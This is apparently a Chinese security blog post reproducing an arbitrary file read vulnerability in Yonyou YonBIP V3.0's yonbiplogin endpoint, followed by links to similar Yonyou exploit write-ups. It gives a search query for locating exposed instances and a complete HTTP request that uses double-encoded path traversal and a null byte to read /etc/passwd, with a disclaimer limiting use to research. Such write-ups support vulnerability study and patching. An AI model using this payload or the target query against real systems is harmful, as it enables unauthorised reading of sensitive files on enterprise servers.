【漏洞复现】|用友YonBIP yonbiplogin任意文件读取

原创 已于 2024-11-20 13:27:30 修改 · 2.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #经验分享 #笔记

于 2024-11-19 16:46:45 首次发布

漏洞描述

YonBIP用友商业创新平台,是用友在数字经济时代面向成长型、大型企业及巨型企业,融合了先进且高可用技术平台和公共与关键商业应用与服务,支撑和运行客户的商业创新(业务创新、管理变革),并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版yonbiplogin存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。

影响范围

YonBIP V3.0(R5_2312)

YonBIP V3.0(R5_2312_SP240517)

资产概要

title="YonBIP" || title="数字化工作台"

漏洞复现

GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1
Host: *******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br

 免责声明

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任,均由使用者自行承担,作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC,旨在促进学术研究与技术交流,不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形,请立即与作者联系,作者将尽快采取必要措施予以删除并致以歉意。

用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 1万+
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友U8 cloud servicedispatcher 反序列化漏洞(含批量验证poc)
weixin_43567873的博客
04-28 2990
用友U8 cloud servicedispatcher 反序列化漏洞(含批量验证poc)
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
ZL_1618的博客
03-29 1028
补丁名称问题描述发布时间产品版本领域模块nc65_sysFunctionManager下标越界和空指针合集补丁NC6.5集团采供库存管理nc633_ldap公共入口漏洞补丁nc633_ldap公共入口漏洞补丁NC6.33UAP基础技术框架nc65_ldap公共入口漏洞补丁nc65_ldap公共入口漏洞补丁NC6.5UAP基础技术框架ncc1909ldap公共入口漏洞补丁ncc1909ldap公共入口漏洞补丁应用平台基础技术框架。
如何快速排查永洪BI报表数据的差异,定位并解决问题
ITHomeZSL的博客
09-20 685
排查永洪BI报表数据差异是一个系统化的工作,需要耐心和清晰的思路。遵循以下步骤,可以高效地定位并解决问题。从最宏观的报表展示层开始,逐步深入到最底层的数据源,像剥洋葱一样,逐层排除,锁定问题根源。通过以上系统化的方法,绝大多数永洪BI的数据差异问题都可以被高效地定位和解决。如果初步检查未发现问题,请按照以下分层结构进行深入排查。在深入分析之前,先排除一些最常见的低级错误和误解。问题可能出在数据库、数据仓库或文件本身。问题可能出在创建数据集时的建模过程中。问题可能出在报表组件的计算和设置上。
漏洞复现用友-移动系统管理-backup-sql注入
知黑而守白
01-26 199
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理 backup 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
用友YonBIP-R5旗舰版 yonbiplogin 任意文件读取漏洞复现
iSee857的博客
11-15 549
用友YonBIP-R5旗舰版 yonbiplogin接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
用友YonBIP R5旗舰版 yonbiplogin 任意文件读取漏洞
zmxz1的博客
11-27 855
用友YonBIP(Yonyou Business Innovation Platform)R5旗舰版是用友公司在数字经济时代背景下,针对成长型、大型及巨型企业推出的一款商业创新平台。融合了先进且高可用技术平台和公共与关键商业应用与服务,支撑和运行客户的商业创新(业务创新、管理变革),具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征。
用友U8CRM系统help2 任意文件读取漏洞复现
fly夏天的博客
12-23 1006
用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。本文复现了这个漏洞并提供了进一步获取系统敏感文件的方法。
用友NC printBill 任意文件读取/删除漏洞复现(XVE-2024-10609)
0xSec
05-14 797
用友NC printBill 接口处存在任意文件读取/删除漏洞,未经身份验证的远程攻击者可利用该漏洞读取或删除系统敏感文件。使系统处于极不安全的状态。
用友NC downCourseWare 任意文件读取漏洞复现
0xSec
06-06 862
用友NC 系统 /portal/pt/downCourseWare/download接口的filename参数存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。
漏洞复现用友NC-任意文件上传-uploadFile
知黑而守白
05-05 587
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
用友U8-Cloud FileServlet接口存在任意文件读取漏洞
wan___she__pi的博客
04-02 474
U8 cloud U8 cloud不同于传统的ERP,融合了交易、服务、管理于一体,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。QzovL3dpbmRvd3Mvd2luLmluaQ== 是C://windows/win.ini 的base64编码。该系统FileServlet存在任何文件读取漏洞。app="用友-U8-Cloud"
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 1098
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
【1day】用友移动管理系统任意文件读取漏洞学习
记录并分享学习安全的知识点..
10-07 463
用友移动管理系统是用友公司开发的一款移动办公解决方案,旨在帮助企业实现移动办公、移动审批、移动报销等业务流程的管理和处理。该系统提供了一系列移动应用和功能,方便员工随时随地处理工作事务,提高工作效率和响应速度。用友移动管理系统存在任意文件读取漏洞,攻击者可以在未经授权的情况下读取系统上的任意文件
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
热门推荐
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记
weixin_48421613的博客
03-07 637
接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能。如果一个类型实现了某个接口,则所有使用这个接口的地方都支持这种类型的值。接口的定义格式如下: type 接口名称 interface { method1 (参数列表) 返回值列表 method2 (参数列表) 返回值列表 } 例如: type Num interface { Eq (i Num) bool } 如果接口没有任何方
用友NC任意文件读取
voctor2436的博客
05-24 1615
用友NC产品的全新系列、是面向集团企业的世界级高端管理软件,用友NC6的产品定位于大型企业管理与电子商务平台。用友NCFindWeb文件存在任意文件读取漏洞,攻击者通过漏洞可以获取网站源码,导致服务器失陷。用友NC采用J2EE架构和先进开放的集团级开发平台UAP,形成了集团管控8大领域15大行业68个细分行业的解决方案。一般性的建议:关注官方新版本的发布及补丁更新,建议使用对应WAF/IPS进行防护。
漏洞复现用友GPR-U8 slbmbygr SQL注入漏洞
今天是几号的博客
10-03 2141
在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png。用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。POC:拼接/u8qx/slbmbygr.jsp?使用SQLmap进行注入利用。
用友NC portal/file任意文件读取漏洞详情及解决方案
最新发布
11-04
用友NC portal/file任意文件读取漏洞允许未经身份认证的攻击者通过该漏洞获取敏感信息,使系统处于极不安全状态。该漏洞的PoC如下: ```plaintext GET /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值